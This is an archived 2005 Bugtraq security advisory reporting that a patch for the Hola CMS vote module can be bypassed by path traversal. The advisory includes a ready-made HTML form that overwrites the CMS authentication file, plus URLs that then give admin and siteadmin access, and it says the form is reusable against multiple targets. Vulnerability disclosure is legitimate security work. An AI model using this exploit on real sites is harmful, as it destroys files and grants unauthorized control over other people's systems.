Virginity Security Advisory 2005-002 : Hola CMS - Another File destruction and System access

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Virginity Security Advisory 2005-002 : Hola CMS - Another File destruction and System access
From: Virginity Security <advisory05@xxxxxxxxxxx>
Date: 15 Mar 2005 17:09:22 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-002
- - - --------------------------------------------------------------------
             DATE : 2005-03-13 15:11 GMT
             TYPE : remote
VERSIONS AFFECTED : hola-cms-1.4.9-1 (http://holacms.drunkencat.net/)
           AUTHOR : Virginity
  ADVISORY NUMBER : 004
- - - --------------------------------------------------------------------


Description:

Like the one in SA-2005-001:
A new patched version 1.4.9-1 got released where that issue was marked as 
solved.
The Vote-Module(vote_save_results.php) now checks with strpos() wether 
the submitted "vote_filename" variable contains "holaDB/votes" at position 0.

BUT! Since we all know how to change directories by typing ../
we can still manipluate or destroy every file on the whole server
by simply doing "vote_filename=holaDB/votes/../../[anything we want]"!!!
Below the updated example how to destroy login-authentification file and 
gaining access
to admin-functions!

Really sad that the quick patch (released 3? hours after notifcation)
doesn't really work.

Author of the Software has been notified.

- - - --------------------------------------------------------------------


Example:

Create this html form (that makes it easier to use it on multiple targets):

<form action="http://[target]/[site-with-vote].php?vote=1"; method="POST">
<input type="hidden" name="vote_filename" 
value="holaDB/votes/../../admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>

Of course you'll have to edit [target] and [site-with-vote] to match your site!
Now when you push the button the first lines of the multiuser.php (which
includes the authentication mechanism) get overwritten and by calling
http://[target]/admin/index_cms.php
you have access to all user functions.
by calling
http://[target]/admin/[module you want].php?username=siteadmin
to all siteadmin functions!


- - - --------------------------------------------------------------------


Solution:

Use other CMS... i think PHP-Nuke isn't that vulnerable ;)

- - - --------------------------------------------------------------------


Personal note:

YES! The girl did it again :)
Contact me on IRC!

- - - --------------------------------------------------------------------

Prev by Date: Few remote bugs in zPanel
Next by Date: [ISR] - Novell iChain Mini FTP Server Valid User Disclosure Vulnerability
Previous by thread: Re: Few remote bugs in zPanel
Next by thread: [ISR] - Novell iChain Mini FTP Server Valid User Disclosure Vulnerability
Index(es):
- Date
- Thread